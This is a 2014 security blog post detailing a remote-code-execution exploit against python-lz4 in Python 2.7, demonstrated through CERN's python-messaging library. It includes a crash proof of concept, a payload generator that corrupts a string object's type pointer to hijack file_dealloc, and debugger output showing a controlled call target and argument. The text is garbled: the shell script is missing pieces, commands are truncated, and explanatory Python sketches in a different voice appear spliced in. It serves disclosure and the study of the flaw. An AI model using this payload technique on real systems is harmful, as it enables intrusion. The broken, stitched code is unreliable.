Monday, July 7, 2014

Hacking CERN - Exploiting python-lz4 for Particles and Profit


Editor's Note: The TL;DR of this long technical report can be summarized as follows:
  • LZ4 was always critically vulnerable, whether in the kernel or in userland
  • Exploitation is easy regardless of the attack used (16MB or 2+MB)
  • PoCs are written for python2.7 on 32bit ARM/x86 (scroll to the end)
  • Updating is critical for all consumers of LZ4, not just python-lz4
Additional Note: The author of LZ4 claims that the PoC presented in the blog below was written against some ghostly alternative version of LZ4. For further proof of exploitation, the sample payload generated by the script at the end of this blog post will also crash python-lz4 (versions prior to r119) directly. The CERN software was simply used as a fun real-world example because their package depends on python-lz4. To test, call the Python bindings directly with:
donb@debian:~/lz4$ ./
donb@debian:~/lz4$ printf "\x00\x10\x00\x00" > header.lz4
donb@debian:~/lz4$ cat header.lz4 test.lz4 > exploit.lz4
donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ python
Python 2.7.3 (default, Mar 14 2014, 11:57:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import lz4
>>> f = open("./exploit.lz4")
>>> lz4.uncompress(f.read())
Segmentation fault (core dumped)

A Race Lost Before It Began

Obviously the LZ4 issue has gotten a lot of attention, but unfortunately for the wrong reasons. A side effect of the negative reaction from the author of LZ4 is that maintainers of some packages that depend on the compression algorithm concluded there was little reason to update. As a result, some packages (like java-lz4) updated quickly, while others (like python-lz4) were left behind. 

Speaking with the python-lz4 maintainer, Steeve Morin (@steeve), revealed that he is actually a pretty good guy. Once he learned that there are real and tangible security issues with LZ4, he immediately got to work on a patch. The checkin for the r119 update is now available here. I want to emphasize that once Steeve understood the security impact, he got to work straight away. This is a great example of vendor response, even if the vendor's perception was previously tainted by misinformation. 

Block Size What?

It's understandable that a lot of packages will want to adhere to the LZ4 "standards" and maintain a semblance of block sizes. This is a lot less interesting for higher level languages (HLL) such as Python, Erlang, or even Java, where APIs simply ingest data and pass it along to and from lower layer libraries. Those libraries are expected to enforce the bulk of the standard. This makes HLL code, in many cases (read: most), simply a data proxy. 

There are many, many examples of this trend online. A quick search on GitHub and elsewhere will show countless packages that use libraries such as python-lz4 in ways that violate an implied or documented "standard". Since I have no interest in developing a proof of concept for every Python package out there, I picked one that looked like fun. 

(Re?)Introducing CERN's Messaging Library

In 2013, CERN MIG released some elegant Python messaging APIs built around abstractions that use AMQP, such as RabbitMQ and similar projects. These projects are used to build and implement a distributed Enterprise Messaging System that can traffic data at high speeds across network nodes. The elasticity of this system makes it extremely easy to manage expansion across servers and data-centers. 

EDITOR'S NOTE: The author of LZ4 is spreading more incorrect information on his blog, claiming that CERN uses a custom version of LZ4. This is false. CERN's python-messaging package uses python-lz4 by default, the very package the LZ4 author claims cannot be attacked. 

One cool subproject is python-messaging. This package can be used to build or inspect messages that may then be sent to a message queue, such as DirQ. A handy feature of this package is that it can automatically handle the compression and base64 encoding of data. This means that python-messaging can be used to send a single message to potentially thousands of target systems through a single queue. Since python-messaging incorporates LZ4 by default, all of these endpoints are potentially exploitable. 

A message in python-messaging can be constructed using simple dictionaries. To get the module to parse a JSON message that has been translated into a Python dict, we have to satisfy the requirements of the dejsonify function, which starts at line 296 of the module and is reproduced below. 

def dejsonify(obj):
    """ Returns a message from json structure. """
    is_text = False
    try:
        if obj.get('text'):
            is_text = True
    except AttributeError:
        raise MessageError("dict expected: %s" % obj)
    header = obj.get('header', dict())
    body = obj.get('body', DEFAULT_BODY)
    encoding = list()
    o_encoding = obj.get('encoding')
    if o_encoding:
        encoding = o_encoding.split('+')
        if not is_bytes(body):
            body = body.encode()
    for token in encoding:
        if token not in AVAILABLE_DECODING:
            raise MessageError("decoding not supported: %s" % token)
        elif (token in COMPRESSORS_SUPPORTED and token not in COMPRESSORS):
            raise MessageError("decoding supported but not installed: %s" %
                               token)
    if 'base64' in encoding:
        body = base64.b64decode(body)
    for method in _COMPRESSORS:
        if method in encoding:
            body = _COMPRESSORS[method].uncompress(body)
    if 'utf8' in encoding:
        body = body.decode('utf-8')
    if is_bytes(body):
        if is_text:
            body = body.decode()
    elif not is_text:
        body = body.encode()

    return Message(body, header)

In the code above, there are a few things we have to do to get to the "uncompress()" function at the bottom. They're simple:
  • Add an empty header (dict)
  • Add a body with binary data
  • Define an encoding string that names one or more encodings joined by '+' (for example 'lz4+utf8')
This equates to the following Python2 code:

from messaging import message as M
f = open("./exploit.lz4", "rb")
d = f.read()
j = {'header': {}, 'body': d, 'encoding': 'lz4+utf8'}
msg = M.dejsonify(j)  # the decode loop hands d to the lz4 uncompress()

So now we can see that the LZ4 uncompress function can be called very easily with CERN's python-messaging API. Implementing a full blown RabbitMQ system would be fun here, but that is overkill. It is enough to attack LZ4 through the CERN software as a demonstration of RCE. If you are able to send this simple message into a queue like DirQ, then you have already won.
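The decode order in dejsonify() is what makes this work: whatever bytes sit in 'body' go straight to the compressor, with no size check of their own. The sketch below is a minimal, standard-library-only model of that order. It is not python-messaging's code. zlib stands in for lz4 so it runs anywhere, and decode_body, encode_body, COMPRESSORS and KNOWN are hypothetical names.

```python
import base64
import zlib

# Hypothetical decoder table. zlib stands in for lz4 so the sketch runs with
# the standard library only; in python-messaging the lz4 entry would call the
# lz4 uncompress() on whatever bytes the message carried.
COMPRESSORS = {"zlib": zlib.decompress}
KNOWN = set(["base64", "utf8"]) | set(COMPRESSORS)


def decode_body(body, encoding):
    """Undo a '+'-joined encoding string in the same order as dejsonify()."""
    tokens = encoding.split("+") if encoding else []
    for token in tokens:
        if token not in KNOWN:
            raise ValueError("decoding not supported: %s" % token)
    if "base64" in tokens:
        body = base64.b64decode(body)
    for name, uncompress in COMPRESSORS.items():
        if name in tokens:
            # Bytes taken straight from the message reach the codec here.
            body = uncompress(body)
    if "utf8" in tokens:
        body = body.decode("utf-8")
    return body


def encode_body(text):
    """Inverse of decode_body() for the encoding 'base64+zlib+utf8'."""
    return base64.b64encode(zlib.compress(text.encode("utf-8")))
```

For example, decode_body(encode_body(u"hello"), "base64+zlib+utf8") returns u"hello". The only validation is on the encoding names, never on the compressed payload.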

But, my goal wasn't to simply attack CERN's software. That would be fun, but kind of useless. Why attack one package when you can instead attack any package using python-lz4? That sounds like a lot more fun. 

A Snake Bites Its Tail

It is quite easy to gain remote code execution in Python2 via memory corruption, especially if you can write to memory just before the start of an Object's buffer space. This is precisely what happens with the LZ4 bug. Since there are no memory or buffer size constraints in the CERN python-messaging package, we'll use the 16MB attack to easily point to memory prior to the start of the decompression buffer. 

Let's take a look at the Python bindings in python-lz4. You can follow along here:

    dest_size = load_le32(source);
    if (dest_size > INT_MAX) {
        PyErr_Format(PyExc_ValueError, "invalid size in header: 0x%x", dest_size);
        return NULL;
    }
    result = PyBytes_FromStringAndSize(NULL, dest_size);
    if (result != NULL && dest_size > 0) {
        char *dest = PyBytes_AS_STRING(result);
        int osize = LZ4_decompress_safe(source + hdr_size, dest, source_size - hdr_size, dest_size);

As can be seen above, a four-byte little-endian header must be placed at the start of the LZ4 payload. This value represents the size of the decompressed data. We can use almost any value here, but I chose (1024 * 1024) for simplicity. 
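The header handling in the binding is easy to model in Python. This is a minimal sketch that assumes hdr_size is 4, as load_le32() implies. frame_block and read_header are hypothetical helpers that mimic the C code above, including its INT_MAX check. They are not part of python-lz4's API.

```python
import struct

INT_MAX = 2 ** 31 - 1  # same limit the C binding checks against


def frame_block(raw_block, decompressed_size):
    """Prefix a raw LZ4 block with a 4-byte little-endian size header.

    Hypothetical helper: assumes hdr_size == 4, as load_le32() implies.
    """
    return struct.pack("<I", decompressed_size) + raw_block


def read_header(data):
    """Split data into (dest_size, lz4_block) the way the binding does."""
    if len(data) < 4:
        raise ValueError("input too short for a size header")
    (dest_size,) = struct.unpack_from("<I", data, 0)
    if dest_size > INT_MAX:
        raise ValueError("invalid size in header: 0x%x" % dest_size)
    return dest_size, data[4:]
```

For example, read_header(b"\x00\x10\x00\x00") returns (4096, b""). frame_block(b"", 1024 * 1024) produces the bytes 00 00 10 00. Note that the size in the header only sets the output allocation. It says nothing about what the compressed block will try to write.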

Line 115 calls the function PyBytes_FromStringAndSize, creating a PyStringObject (a PyObject whose type is PyString_Type). The entire object, with its header values, is allocated in one block that has room for 'dest_size' bytes of string data at its end. That buffer is where the decompressed LZ4 data is written, and it becomes the string Python receives when the bindings return. 

Line 117 contains an important call to PyBytes_AS_STRING. This macro returns a C style pointer to the memory buffer Python has allocated as scratch space. In other words, the address returned is an address that points to memory that can be written to by the LZ4 code. This should be a safe place to store data. 

To understand how this works, let's take a look at the Python source code. Because systems like Debian use a back-patched version of 2.7, we'll focus on the 2.7 branch on GitHub so readers can easily follow along. 

PyBytes_AS_STRING is defined as the macro PyString_AS_STRING. This macro is defined in Include/stringobject.h and simply returns the address of 'ob_sval'. So what is ob_sval? That depends on the structure PyStringObject. Let's take a look.

typedef struct {
    PyObject_VAR_HEAD
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];

    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the string or -1 if not computed yet.
     *     ob_sstate != 0 iff the string object is in stringobject.c's
     *       'interned' dictionary; in this case the two references
     *       from 'interned' to this object are *not counted* in ob_refcnt.
     */
} PyStringObject;

On line 35, shown above, we can see the definition of a PyStringObject. The structure member 'ob_sval' uses a common C idiom, often called the "struct hack" (the pre-C99 form of a flexible array member). An array declared with a size of [1] at the end of a structure signals that the allocation will extend past the end of the structure at this point. In other words, the address of ob_sval (&ob_sval[0]) is the start of the writable memory buffer used by C code. 

To make this more clear, here is an example memory allocation. If you wanted to store the string "Hello" in a PyStringObject, you would use the following code:

int size = strlen("Hello") + 1;
char * ptr;
PyStringObject * string;
string = malloc(sizeof(*string) + size);
ptr = &string->ob_sval[0];
memcpy(ptr, "Hello", size);

This way, the Object maintains its requisite form that includes standard Python PyObject header values, while being capable of storing type specific data. This is a weak form of type inheritance often used in C. 
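The header sits only a few bytes before the data, and this can be checked by mirroring the layout with ctypes. The sketch below is minimal. PyStringObjectMirror and bytes_before_data are hypothetical names. The mirror assumes CPython 2.7's PyStringObject on a non-debug build, with PyObject_VAR_HEAD expanding to ob_refcnt, ob_type and ob_size, compiled with the platform's default alignment.

```python
import ctypes


class PyStringObjectMirror(ctypes.Structure):
    """Hypothetical ctypes mirror of CPython 2.7's PyStringObject.

    Assumes a non-debug build (Py_TRACE_REFS undefined, so
    _PyObject_HEAD_EXTRA adds no fields).
    """
    _fields_ = [
        ("ob_refcnt", ctypes.c_ssize_t),  # PyObject_HEAD
        ("ob_type", ctypes.c_void_p),     # PyObject_HEAD
        ("ob_size", ctypes.c_ssize_t),    # added by PyObject_VAR_HEAD
        ("ob_shash", ctypes.c_long),
        ("ob_sstate", ctypes.c_int),
        ("ob_sval", ctypes.c_char * 1),   # &ob_sval[0] is what 'dest' points at
    ]


def bytes_before_data(field):
    """How many bytes before &ob_sval[0] the given header field starts."""
    data_offset = PyStringObjectMirror.ob_sval.offset
    return data_offset - getattr(PyStringObjectMirror, field).offset
```

On a typical 64-bit Linux build, bytes_before_data("ob_type") comes out to 28. On 32-bit x86 Linux it is 16. Either way, it is a short step backwards from the buffer the decompressor writes into.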

So let's look back at the python-lz4 code to see why this information is important. 

        char *dest = PyBytes_AS_STRING(result);
        int osize = LZ4_decompress_safe(source + hdr_size, dest, source_size - hdr_size, dest_size);

Now, in looking at the above code, we realize that the address 'dest' points to an address within the actual PyStringObject structure. This means that if we can point to slightly before the address stored in 'dest', we can overwrite critical values in the PyStringObject header. 

Most importantly, we can overwrite the core header values within PyStringObject. These values are defined with the macro PyObject_VAR_HEAD, as seen in the code snippet above. Tracing the multiple layers of definitions for PyObject_VAR_HEAD leads us to the core values in a PyObject structure, defined with the macro PyObject_HEAD found on line 77 of this file

/* PyObject_HEAD defines the initial segment of every PyObject. */
#define PyObject_HEAD                   \
    _PyObject_HEAD_EXTRA                \
    Py_ssize_t ob_refcnt;               \
    struct _typeobject *ob_type;

The macro _PyObject_HEAD_EXTRA only adds fields when Py_TRACE_REFS is defined (a debug-build option), which it shouldn't be on your distribution unless you have a custom variant. So, the first variable in a PyObject (or PyStringObject) structure is 'ob_refcnt', followed by 'ob_type'. PyObject_VAR_HEAD then appends 'ob_size'. 
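The same two-field head can be observed directly on a current CPython interpreter. The sketch below uses a hypothetical helper, peek_header, and relies on two implementation details: id() returns the object's address, and a default (non-free-threaded) build places ob_type immediately after the reference count. It shows that ob_type is nothing more than a pointer to the type object.

```python
import ctypes


def peek_header(obj):
    """Return (ob_refcnt, ob_type) read directly from a live object.

    Relies on CPython implementation details: id() returns the object's
    address, and in a default build ob_refcnt is followed by ob_type.
    """
    addr = id(obj)
    refcnt = ctypes.c_ssize_t.from_address(addr).value
    type_ptr = ctypes.c_void_p.from_address(
        addr + ctypes.sizeof(ctypes.c_ssize_t)).value
    return refcnt, type_ptr
```

On such builds, peek_header(b"abc")[1] equals id(bytes). Changing that one pointer changes which type's functions the interpreter uses for the object.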

Type Confusion In C

The variable we'll focus on here is 'ob_type'. Why? This is the variable that defines what type of structure is held within a PyObject. This is where CPython's weird (unholy?) dynamic type system, implemented by hand in C, comes in. This variable basically tells the C code how to interpret the rest of the structure after 'ob_type'. In the case of a string, 'ob_type' points to PyString_Type. 

Now, PyString_Type is of the type PyTypeObject, another base structure similar to PyObject, except more detailed. It's important to note that like PyObject, it shares the same base header values defined by PyObject_VAR_HEAD. Even more important is the fact that PyTypeObject is a structure that contains multiple function pointers, such as tp_dealloc, the function that will be called when an Object is no longer used. Check out the structure on line 324 of this file

typedef struct _typeobject {
    PyObject_VAR_HEAD
    const char *tp_name; /* For printing, in format "<module>.<name>" */
    Py_ssize_t tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */

    destructor tp_dealloc;
    /* ... */
} PyTypeObject;

As depicted above, if we can corrupt memory and overwrite the PyStringObject's ob_type variable, we can point it to a different object than to PyString_Type. This means that, potentially, we can call a function of our choice. 

But, this doesn't give us straight up code execution, does it? No, it doesn't. This is because we have no idea where in memory our payload resides due to ASLR and other subtleties of the heap allocation system. As a result, we can't simply point back into our own buffer. We have to get a bit creative. 

Keep in mind that even though we can overwrite an address to an Object that contains a pointer, that doesn't get us much. Because of ASLR and the requirement of using a specific address offset from the base of an Object in memory, we don't have many valid choices. This means that we are going to have to dig into the Python base executable to identify a secondary function to attack. 

We know that when our Object's reference count drops to zero, CPython deallocates it by passing the Object's base address to the tp_dealloc destructor of its type. What we need to do is figure out where in the Python code base there is a type whose destructor will use our payload as a place to retrieve other function pointers. 
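Timing matters here. In CPython, the destructor runs as soon as the last reference disappears, not during some later garbage collection pass. The small sketch below makes this visible with a __del__ hook, which CPython invokes from the deallocation path. The names are hypothetical, and the behavior is CPython-specific; other implementations such as PyPy may delay finalization.

```python
def refcount_dealloc_demo():
    """Show that CPython deallocates an object the moment its refcount hits 0."""
    events = []

    class Tracked(object):
        def __del__(self):
            # Called from the type's deallocation path in CPython.
            events.append("dealloc")

    obj = Tracked()
    alias = obj                 # two references to the same object
    del obj
    snapshot = list(events)     # alias still holds a reference: nothing yet
    del alias                   # last reference gone: deallocated immediately
    return snapshot, list(events)
```

Calling refcount_dealloc_demo() returns ([], ["dealloc"]). This is why a corrupted ob_type is consulted as soon as the decompressed string is released.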

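Since we know we can overwrite the PyStringObject.ob_type variable using the LZ4 bug, let's find a function in Python that will do our bidding. Remember, the python binary is not built as a position-independent executable (PIE) on most systems, so its code and static data, including the built-in type objects, sit at fixed addresses. You can check this by executing the following: 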

donb@mouse:~$ readelf -h /usr/bin/python2.7
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)

If the above Type is "EXEC" and not "DYN", you're golden. This should be true even of recent Ubuntu systems, Debian, Mint, etc. 
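The same check can be done without readelf. This sketch reads the e_type field at offset 16 of the ELF header and honors the byte order given in e_ident. elf_type and elf_type_of_path are hypothetical helpers. Note that DYN covers both PIE executables and shared libraries.

```python
import struct

ET_EXEC, ET_DYN = 2, 3


def elf_type(header):
    """Return 'EXEC', 'DYN' or 'OTHER' from the first 18+ bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[EI_DATA] (byte 5): 1 = little endian, 2 = big endian.
    order = "<" if header[5:6] == b"\x01" else ">"
    # e_type follows the 16-byte e_ident in both ELF32 and ELF64.
    (e_type,) = struct.unpack_from(order + "H", header, 16)
    return {ET_EXEC: "EXEC", ET_DYN: "DYN"}.get(e_type, "OTHER")


def elf_type_of_path(path):
    with open(path, "rb") as f:
        return elf_type(f.read(18))
```

For example, elf_type_of_path("/usr/bin/python2.7") should report "EXEC" on the systems described above.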

Knowing that the base executable is not PIE, we can specify a different PyTypeObject that will get us more of the flexibility we want. After scouring through various Python types, an obvious contender appears. Check out line 2468 of Objects/fileobject.c

PyTypeObject PyFile_Type = {
    PyVarObject_HEAD_INIT(&PyType_Type, 0)
    "file",
    sizeof(PyFileObject),
    0,
    (destructor)file_dealloc,                   /* tp_dealloc */
    /* ... */
};

The structure above is defined with a custom destructor function 'file_dealloc'. Upon inspection, the function 'file_dealloc' is passed a PyObject that is interpreted as a PyFileObject*. So, our PyStringObject* pointer, when passed to file_dealloc, would be interpreted as a File Object, not a String Object. 

This function almost immediately calls close_the_file, another custom function specific to the File Object code. This function takes an address straight from our payload and interprets it as a function address. It calls it later as "local_close". Check out the function on line 420 of the same file. 

static PyObject *
close_the_file(PyFileObject *f)
{
    int sts = 0;
    int (*local_close)(FILE *);
    FILE *local_fp = f->f_fp;
    char *local_setbuf = f->f_setbuf;
    if (local_fp != NULL) {
        local_close = f->f_close;
        if (local_close != NULL && f->unlocked_count > 0) {
            if (f->ob_refcnt > 0) {
                PyErr_SetString(PyExc_IOError,
                    "close() called during concurrent "
                    "operation on the same file object.");
            } else {
                /* This should not happen unless someone is
                 * carelessly playing with the PyFileObject
                 * struct fields and/or its associated FILE
                 * pointer. */
                PyErr_SetString(PyExc_SystemError,
                    "PyFileObject locking error in "
                    "destructor (refcnt <= 0 at close).");
            }
            return NULL;
        }
        /* NULL out the FILE pointer before releasing the GIL, because
         * it will not be valid anymore after the close() function is
         * called. */
        f->f_fp = NULL;
        if (local_close != NULL) {
            /* Issue #9295: must temporarily reset f_setbuf so that another
               thread doesn't free it when running file_close() concurrently.
               Otherwise this close() will crash when flushing the buffer. */
            f->f_setbuf = NULL;
            Py_BEGIN_ALLOW_THREADS
            errno = 0;
            sts = (*local_close)(local_fp);
            /* ... */

As we can see above, there are few requirements for executing local_close(). In addition, local_close is passed a variable 'local_fp', which is a value also obtained from our payload. 

If we can ensure that 'unlocked_count' is equal to zero and 'weakreflist' (checked first in file_dealloc) is NULL, and that 'f_fp' and 'f_close' are non-NULL, we will end up with a call to any address we choose, with an argument of any value we choose. This is a much better way to kick off a ROP payload, as we now control both the call target and its first argument. 
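The core trick is reading one memory region through two different struct layouts, and it can be modeled safely in pure Python. ToyString and ToyFile below are hypothetical toy layouts, not CPython's real structures. They only share a two-field head, the way PyStringObject and PyFileObject share PyObject_HEAD. Little-endian layouts are used so the result does not depend on the host.

```python
import ctypes


class ToyString(ctypes.LittleEndianStructure):
    """Hypothetical 'string' layout: shared head, length, then raw data."""
    _fields_ = [
        ("refcnt", ctypes.c_uint32),   # shared head
        ("type_id", ctypes.c_uint32),  # shared head: says how to read the rest
        ("length", ctypes.c_uint32),
        ("data", ctypes.c_char * 8),   # bytes supplied by the caller
    ]


class ToyFile(ctypes.LittleEndianStructure):
    """Hypothetical 'file' layout over the same number of bytes."""
    _fields_ = [
        ("refcnt", ctypes.c_uint32),
        ("type_id", ctypes.c_uint32),
        ("name", ctypes.c_uint32),      # overlaps ToyString.length
        ("fp", ctypes.c_uint32),        # overlaps data[0:4]
        ("close_fn", ctypes.c_uint32),  # overlaps data[4:8]
    ]


def reinterpret_as_file(s):
    """View the same memory as a ToyFile, as a destructor chosen by a
    swapped type would; from_buffer shares memory rather than copying."""
    return ToyFile.from_buffer(s)
```

For example, given ToyString(refcnt=1, type_id=1, length=8, data=b"\x11\x22\x33\x44\x55\x66\x77\x88"), the ToyFile view reads 'fp' as 0x44332211 and 'close_fn' as 0x88776655. This mirrors the pair of values used in the payload below.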

The Payload

Now that we know we can get arbitrary code execution, all that is left is to figure out how to generate an LZ4 payload that mimics a PyFileObject. 

# - payload generator
# A Python2.7 exploit for 32bit Debian 7.5.0
# by Don A. Bailey
# For technical evaluation only. Do not misuse.


        printf $1 >> $FILE

        rm -f $FILE
        touch $FILE

        x="\"\\xff\" x $1" 
        perl -e "print $x" >> $FILE

        while [ $i -lt $1 ]; do
                append $2

# initialize the file

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well 
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# create the offset and point to PyObject.ob_type
large 16842995
append "\xdd"

# PyFile_Type technique
# we need 72 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"      # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"      # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# now finish with a bad reference
append "\xff\xff"

In the script above, I have written a payload generator for 32bit Debian 7.5.0. By overwriting ob_type so that its tp_dealloc resolves to file_dealloc(), we force Python to interpret our PyStringObject as a PyFileObject when it is deallocated. This causes close_the_file() to interpret 'f_close' as the function address 0x88776655. It will be passed the value 0x44332211, also taken from our payload. 

The Proof

To test this payload, we simply generate the LZ4 payload, place a small header at the front of the payload, and execute the attack using CERN's code as a test bed. 

donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ cat header.lz4 test.lz4 > x.lz4 
donb@debian:~/lz4$ PYTHONPATH=~/lib/src/cern/python-messaging /usr/bin/python ./
Lazy4 python2.7 RCE -
+ opening lz4 payload
+ building header
+ attacking CERN
Segmentation fault (core dumped)
donb@debian:~/lz4$ gdb -q /usr/bin/python2.7 core
Reading symbols from /usr/bin/python2.7...(no debugging symbols found)...done.
[New LWP 5776]

warning: Can't read pathname for load map: Input/output error.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
Core was generated by `/usr/bin/python ./'.
Program terminated with signal 11, Segmentation fault.
#0  0x88776655 in ?? ()
(gdb) x/8x $esp
0xbfffee4c:     0x08196350      0x44332211      0xb798e12a      0xbfffeebc
0xbfffee5c:     0xb7d27c60      0xb798e126      0x0830f47c      0x082f1050
(gdb) i r ebp
ebp            0x44332211       0x44332211
(gdb) i r esi
esi            0x88776655       -2005440939

In the above example, we've successfully exploited Python2.7 and triggered a call to the function at the (invalid) address 0x88776655. We've also successfully passed the argument 0x44332211 as the first parameter to our function. Note that ebp and esi are set to our values, making ROP a bit easier to deal with. 

After incorporating a sufficient ROP payload, we can execute a shell. ROP payload development is left as an exercise for the reader. 

donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ cat header.lz4 test.lz4 > x.lz4 
donb@debian:~/lz4$ PYTHONPATH=~/lib/src/cern/python-messaging /usr/bin/python ./
Lazy4 python2.7 RCE -
+ opening lz4 payload
+ building header
+ attacking CERN


I think this conclusively proves the value of an exploit against LZ4. This is not a CERN-specific attack, but an attack against Python, using python-lz4. While the exploit (for now) will need to be tailored to each specific target platform, each platform is vulnerable in the same way. That makes an elegant memory corruption bug like this one a risk on every platform. 

I have tested and succeeded in developing payloads for both ARM (32bit) and x86 (32bit) on Ubuntu and Debian. 

For more information on this vulnerability, and for help fixing or identifying if your implementation is at risk of exploitation, please visit our website. The Lab Mouse team is dedicated to providing you with top tier information security services. We're happy to help you through a white box, black box, or red team assessment, or simply to streamline security within your project or organization. 

Feel free to reach out to us for more information. We're always eager to help, even if it just means having a short discussion! 

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security
